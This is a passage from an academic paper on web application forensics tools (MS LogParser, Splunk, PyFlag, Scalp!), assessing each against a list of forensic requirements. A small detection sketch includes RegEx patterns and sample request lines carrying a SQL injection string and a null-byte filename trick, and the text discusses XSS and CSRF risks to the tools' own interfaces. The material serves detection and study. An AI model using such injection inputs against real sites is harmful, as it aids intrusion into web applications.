It is genuinely difficult to define a black-list RegEx which covers a whole class of malicious strings and still remains precise ('fresh'). Furthermore, it is a challenge to implement a forensics tool with a minimal, compact collection of malicious signatures that remains universally valid. Probability analysis supporting a timely detection of malicious signatures is a further challenging topic. Moreover, it is very useful if the tool is extensible by the forensics investigator, in the sense that the security professional is allowed to refresh and update the list of RegExes detecting malicious payload manually. The importance of proper URL encoding has already been illustrated by the examples in Sections 3.1. and 3.2. and requires no further discussion. These conclusions support the statement that TRR 1 up to TRR 10 are relevant and fundamentally important for proper WAFO. Let us present a couple of interesting examples of particular WAFO automated tool candidates in the next Sections 4.2. and 4.3.. As the requirements basis for the tools is already specified, we classify the tools in general into proprietary and Open Source ones and describe an appropriate selection of each accordingly.
4.2. Proprietary tools
As we regard Business related Webapps as a sufficient criterion, we first describe the Business-to-Business implementations of WAFO automated tools. Current representatives of this class are: EnCase [L10], FTK [L11], Microsoft LogParser [L12], Splunk [L13] etc. According to the WAFO tool requirements, the author of the paper considers the following tools to be the favorites in this category.
Microsoft LogParser
This forensics tool was developed by Gabriele Giuseppini29. A brief history of MS LogParser is given in [L15], [L16]. The application can be obtained and utilized for free, see [L12], although, according to [L14], Microsoft rather designates it as "skunkware" and is reluctant to give official support for it. The current version of the tool is LogParser 2.2, released in 2005. An unofficial support site for the tool can be found at www.logparser.com30. The parser comprises in general the following three main units: an input engine, a SQL-like query engine core and an output engine. A good illustration of the tool's structure is given in [L16], see Appendix B, Figure 19. MS LogParser supports many independent input file formats: IIS log files (Netmon capture logs), Event log files, text files (W3C, CSV, TSV, XML etc.), Windows Registry databases, SQL Server databases, MS ISA Server log files, MS Exchange log files, SMTP protocol log files, extended W3C log files (like Firewall log files) etc. Another strength of the tool is that it can search for specific files in the observed file system and also for specific Active Directory objects. Furthermore, the input engine can combine payload from the different input file formats, which allows a consolidated parsing and data correlation; thus TRR 1 and TRR 2 are satisfied. Acceptable input data types are INTEGER, STRING, TIMESTAMP, REAL and NULL,
29 http://nl.linkedin.com/in/gabrielegiuseppini
30 Unluckily, at the present moment this site seems to be down.
which satisfies TRR 3. According to [L17], parsing of the input data is achieved in efficient time, which is another positive feature of the tool. As the data is supplied to the core engine, the forensics examiner can parse it utilizing SQL-like queries. By default, this is done via a standard command line console, explained explicitly in [21]. Before illustrating this with an example, let us mention that there are unofficial front-ends providing more user-friendly GUIs, like simpleLPview0031. However, as the domain logparser.com seems to be down during the paper's development phase, the author of the paper is not able to test the GUI front-end. For the reader concerned, the GUI versions of MS LogParser are not limited to that front-end: developers can extend the MS LogParser UI via COM objects, see [L15], which enables the forensics professional to extend the tool's abilities by programming custom input format plug-ins. Let us illustrate the MS LogParser syntax, see [L15]:
C:\Logs>logparser "SELECT * INTO EventLogsTable FROM System" -i:EVT -o:SQL -database:LogsDatabase -iCheckpoint:MyCheckpoint.lpc
This example represents a SQL-like query, where the input file format specified by -i concerns the MS Event logs; the output format is SQL, which means the results are stored in a database and can be filtered further as appropriate. An important option is -iCheckpoint, which provides the ability to set a checkpoint on the log files and thus achieve an incremental parsing of the observed log data; this increases the efficiency of parsing large log files and to some extent satisfies TRR 4. The next example, see [L15]:
C:\>logparser "SELECT ComputerName, TimeGenerated AS LogonTime, STRCAT(STRCAT(EXTRACT_TOKEN(Strings, 1, '|'), '\'), EXTRACT_TOKEN(Strings, 0, '|')) AS Username FROM \\SERVER01\Security WHERE EventID IN (552; 528) AND EventCategoryName = 'Logon/Logoff'" -i:EVT
demonstrates a simple string manipulation, which can be extended by RegExes and satisfies TRR 5 and 7. Further interesting paradigms can be found in [15], [L15], [L16], [L17]. Another notable aspect of MS LogParser is its ability to execute automated tasks. One approach is to write batch jobs for the tool and create system scheduler entries for their automated execution, please consider [L14]. Furthermore, the examiner can drive MS LogParser via Windows scripting, as in [L17]; Appendix B, Figure 20 illustrates this. The standard implementation scenario is given as follows, see [L17]:
• register the LogParser.dll
• create the LogParser object
• define and configure the Input format object
• define and configure the Output format object
• specify the LogParser query
• execute the query and obtain the payload
This brief introduction of MS LogParser demonstrates its power without a doubt. However, the tool should be considered appropriate mainly for MS Windows based environments, such as .asp, .aspx and .mspx Web applications.
31 http://www.logparser.com/simpleLPview00.zip
An open question remains regarding the proper examination of Silverlight implementations. Another possible issue could be the iCheckpoint option configuring the incremental parsing jobs: locating the .lpc configuration file(s) could easily lead an intruder to the log files related to the forensics jobs, which could then be exploited directly.
Splunk
This tool is developed and maintained by Splunk Inc.32. Its current stable release is 4.2.2 (2011). Although the professional version of the tool is high priced, there is a trial version, limited to 30 days and to an amount of parsed log data of up to 500 MB, which can be employed for free. Furthermore, there is community support for Splunk in the form of a mailing list and a community wiki hosted on the Splunk Inc. domain. Official support regarding the Splunk documentation, version releases and FAQ/case studies is presented on the tool's website, which requires a free registration. Another advantage of Splunk is the on-the-fly official/community IRC support. A further interesting feature are the video tutorials uploaded by users and official professionals, demonstrating specific usage scenarios and case studies. The tool has wide OS support: Windows, Linux, Solaris, Mac OS, FreeBSD, AIX and HP-UX. Splunk can be considered a rather hardware-consuming application33. It was tested on an Intel Pentium T7700 machine with 3 GB of RAM under Windows XP Professional SP3 and Ubuntu Linux 10.04 Lucid Lynx. In both cases the setup ran flawlessly with little additional installation effort on the user's side. After successful installation Splunk registers a new user on the host OS, which can be deactivated. The tool is a Python based application. It comprises a Web server, an OpenSSL server and an OpenLDAP instance, which interact with the different parsers for the input data. The configuration of the different Splunk elements is implemented via XML, which allows them to be adjusted in a user-friendly way. Splunk has even broader input format support than MS LogParser, which makes the tool not only OS independent, but also an all-rounder regarding input formats. An interesting combination of Splunk with Nagios is discussed in [L18]. A screenshot of the officially advertised features of the tool is given in Appendix B, Figure 21. These aspects relate to TRR 1, 2, 3, 4 and 5; TRR 7, 9 and 10 would have to be tested more extensively in particular. The user interacts with Splunk via a common Web browser. The different Splunk elements are organized on a dashboard, which can be reordered and arranged in a user-friendly manner. Let us describe the main Splunk units in more detail. Their description is based on [L19], which concerns Splunk version 3.2.6; although Splunk has been completely rewritten after version 4.0, the main business logic units remain. In general, the idea behind this tool is not only to parse different log file formats and support different network protocols, but also to index the parsed data. Thus, the tool resembles a search engine like those widely known on the Internet today. This allows the user to accomplish more user-friendly and precise searches on specific criteria. Indeed, the query responses from the tail dashboard are significantly fast.
32 http://www.splunk.com/
33 http://www.splunk.com/base/Documentation/latest/installation/SystemRequirements
Intuitively, the first Splunk unit is the index engine; it supports SNMP and syslog as well. Consequently, the second unit is the search core engine. One can include different search operators on specific criteria, like Boolean, nested, quoted and wildcard operators, which respects, as already stated, TRR 5 and 7. The third unit is the alert engine, which to some extent satisfies TRR 9; the notifications can be sent via RSS, e-mail, SNMP, or even particular Web hyperlinks. In addition, the fourth unit implements the reporting ability of Splunk (TRR 2 and 3). On a specifically prepared dashboard the user/forensic examiner can not only obtain detailed results on the parsed payload in text format, but also derived information in the form of interactive charts and graphs and specifically formatted tables matching the auditing jobs. These are well illustrated in Appendix B, Figure 22. An interesting example describes the reporting abilities of Splunk for detecting JavaScript onerror entries by means of a user-developed JSON script, see [L22]. The fifth and last unit is the sharing engine of Splunk. It reflects the push for users' collaborative work with this tool, where know-how exchange is encouraged. Another motivation for this unit is a distributed Splunk environment, in which not only a single instance of Splunk serves the specific network. Further abilities of the forensic tool worth mentioning are the scaling of the observed network and the security of the parsed data. This last feature deserves a more detailed discussion. An open question remains, as noted for MS LogParser, whether the tool itself is hardened enough, considering the fact that the large payload data is not only indexed, but also represented in a user-friendly way. As Splunk is without a doubt an interface to every log file and protocol on the observed network, it is highly likely that this central point will be targeted. If an attacker succeeds in this matter, he can obtain every detail related to the observed network represented in a user-friendly format, which relieves the intruder of collecting valuable payload data himself and minimizes his or her penetration efforts. As the Splunk front-end is rendered in a Web browser, the reader concerned will intuitively notice that CSRF [4] and CSFU [L20] could be respectable candidates for such attacking scenarios, especially combined with DOM based XSS attacks [20], [L21], which can trigger the malicious events in the Browser engine. If such scenarios can be achieved, Splunk could turn into a favorite jump-start platform for exploiting secured networks, instead of being utilized as an appropriate forensic investigation tool. This designates an essential aspect concerning future work on WAFO. We do not extend this discussion further, as it goes beyond the boundaries of the present paper. Let us introduce the selected Open Source WAFO tools, as mentioned above.
4.3. Open Source tools
At first, let us describe PyFlag.
PyFlag
As with the previously described tool, there is a team behind the PyFlag development: Dr. Michael Cohen, David Collett and Gavin Jackson. The tool's name is an abbreviation of: Python based Forensic and Log Analysis GUI. PyFlag is another Python implementation of a forensic investigation tool which uses the common Web browser as the front-end for the user.
The current version of the tool is pyflag-0.87-pre1 (2008). The tool is hosted at SourceForge34 and, as an Open Source application, it can be obtained for free under the GPL. The support site is www.pyflag.net; this domain also hosts the PyFlag Wiki with presentations of the tool and video tutorials. A further advantage is a forensics image predefined for examination, also hosted on the support site, which can be employed for training purposes in forensic investigation. The general structure of the tool can be described as follows. The Python application starts a Web Server for displaying the parsing output; the collected input data is stored in a MySQL server, which allows the tool to operate with a large number of log file lines, respecting TRR 4. The IO Source engine is the interface to the forensic images, which enables the tool to operate with large-scale input file types, comparable to Splunk. Once the observed image is loaded by the Loader engine into the Virtual File System, different scanners can be utilized for gaining the forensically relevant payload from the raw data. For the reader concerned, please refer to [L26]. The main PyFlag data flow is illustrated in the next Figure 15:
Figure 15: Main PyFlag data flow, as [L26]
PyFlag is natively written to support Unix-like OSes. A Windows based port, PyFlagWindows35, is currently presented on the support Web site, which makes the tool OS independent as well. The PyFlag developers state that the tool is not only a forensic investigation tool, but rather a rich development framework. The tool can be used in two modes: either as a Python shell, called PyFlash, or as a user-friendly Web GUI. The installation process requires some user input; more precisely, common installation routines are demanded, like unpacking the archive to a destination on the host OS, configuring the source via ./configure on Linux systems, checking for dependency issues and running make install. The first start of the tool requires the forensics investigator to configure the MySQL administrative account and the Upload directory; this location is crucial, as it holds the forensic images which are to be examined. In general, PyFlag is a Web Application forensic tool (log files), a Network forensic tool (capture images via pcap) and an OS forensic investigation tool. As denoted in the introduction of the paper, we concentrate only on the log file analysis by PyFlag, leaving aside its other features concerning NFO and OSFO (Operating System Forensics). The authors of the tool encourage forensic investigators to correlate the different evidence from WAFO, NFO and OSFO, as was already proposed before.
34 http://sourceforge.net/
35 http://www.pyflag.net/cgi-bin/moin.cgi/PyFlagWindows
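Correlating WAFO, NFO and OSFO evidence presupposes, as TRR 2 and 3 demand, that the timestamps of the individual logs are first brought onto a common time line. A minimal, tool-independent sketch of such a normalization, with assumed formats and sample values, might look like this:

# Minimal sketch: normalize Apache and IIS W3C timestamps to UTC so the entries can be merged and sorted.
from datetime import datetime, timezone

def parse_apache(ts):
    # e.g. "05/Sep/2011:14:03:27 +0200" (Apache access log time stamp, local time with offset)
    return datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z").astimezone(timezone.utc)

def parse_iis(ts):
    # IIS W3C logs are written in UTC, e.g. "2011-09-05 12:03:27"
    return datetime.strptime(ts, "%Y-%m-%d %H:%M:%S").replace(tzinfo=timezone.utc)

events = [
    ("apache", parse_apache("05/Sep/2011:14:03:27 +0200")),
    ("iis",    parse_iis("2011-09-05 12:03:27")),
]
for source, when in sorted(events, key=lambda e: e[1]):
    print(when.isoformat(), source)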
More specifically, PyFlag supports a variety of different and independent input file formats, like the IIS log format, Apache log files, iptables and syslog formats, respecting TRR 1, 2 and 3. The tool also supports different levels of format customization, e.g. Apache logs can be parsed with the default format or with one customized by the security professional. Let us explain this. After the installation is completely set up, the user can work with the browser based PyFlag GUI environment. For analyzing a specific log file, PyFlag offers presets, which are templates that allow parsing a collection of log files of a specific class, e.g. the IIS log file format. The preset selects the driver for parsing the specific log as appropriate. The standard routine for setting up an IIS log file analysis is described in [22] as follows:
• Select “create Log Preset” from the PyFlag “Log Analysis” menu
• Select the “pyflag_iis_standard_log” file to test the preset against
• Select “IIS” as the log driver and start the parsing
A more extensive introduction to the WAFO usage of the tool was presented at Linux.conf.au 2008; please consider watching the presentation video [L23]. After the tool starts to collect payload data from the input source, the forensics investigator can either employ pre-defined queries and thus minimize the parsing time on-the-fly, or wait for the complete data collection. The data noise in the obtained collection can also be reduced via white-listing, as in TRR 7. Moreover, after the data is collected, the examiner can apply index searching via natural-language-like queries, comparable to Splunk. These features explain the efficient searching in PyFlag. Another interesting aspect of the tool is the implementation of GeoIP36 (Apache). It can either be obtained from the Debian repository, which provides a smaller GeoIP collection, or downloaded from the GeoIP website as a complete collection. GeoIP allows parsing the IPs and timestamps and correlating them with the origin location of the GET/POST requests in the log file; this respects TRR 3. The tool can also store the collected evidence payload in output formats like .csv, which explains its utilization as a front-end to other tools applied in the investigation. An illustration of the PyFlag Web GUI is given in Appendix B, Figure 23. To conclude the tool's description, we should mention once more the open question of a possible compromise of the Web GUI, as explained for Splunk. A well known attack concerning HTTP Parameter Pollution against ModSecurity37 was presented by Luca Carettoni38 in 2009, where the IDS is exploited by an XSS instead of an image upload to the system. As mentioned above, this supports the view that the tool should be reviewed for such kinds of exploits and especially rechecked for possible DOM based XSS exploits concerning its own source.
Apache-scalp or Scalp!
This tool should be considered an explicit WAFO investigation tool. Scalp! is developed by Romain Gaucher and the project is hosted on code.google.com. Its current version is 0.4 rev. 28 (2008). The tool is the only one of those described above which definitely deploys RegExes. It is a Python script which can be run in the Python console on the common OSes, which makes it OS independent. The tool is published under the Apache License 2.0 and is designed for parsing especially Apache log files, which restricts its usability to this class of log files and does not respect TRR 1 and 2.
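The general idea behind such a signature based scanner can be sketched as follows: the request lines are URL-decoded first (TRR 10) and only then matched against detection RegExes. The patterns below are purely illustrative assumptions and are not Scalp!'s actual signature set:

# Minimal sketch: URL-decode a request line, then match it against illustrative detection RegExes.
import re
from urllib.parse import unquote

signatures = {
    "sqli":      re.compile(r"('|--|\bor\b\s+1\s*=\s*1)", re.IGNORECASE),
    "null_byte": re.compile("\x00"),
}

def scan(request_line):
    decoded = unquote(request_line)   # "%27" -> "'", "%00" -> NUL byte, ...
    return [name for name, rx in signatures.items() if rx.search(decoded)]

print(scan("GET /login.php?user=admin%27%20or%201%3D1--"))    # -> ['sqli']
print(scan("GET /cgi-bin/login.cgi?file=secret.cgi%00"))      # -> ['null_byte']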
It is tested only on a couple of MiB log files, which disrespects further 36 http://www.maxmind.com/app/mod_geoip 37 http://www.modsecurity.org/ 38 http://www.linkedin.com/in/lucacarettoni 36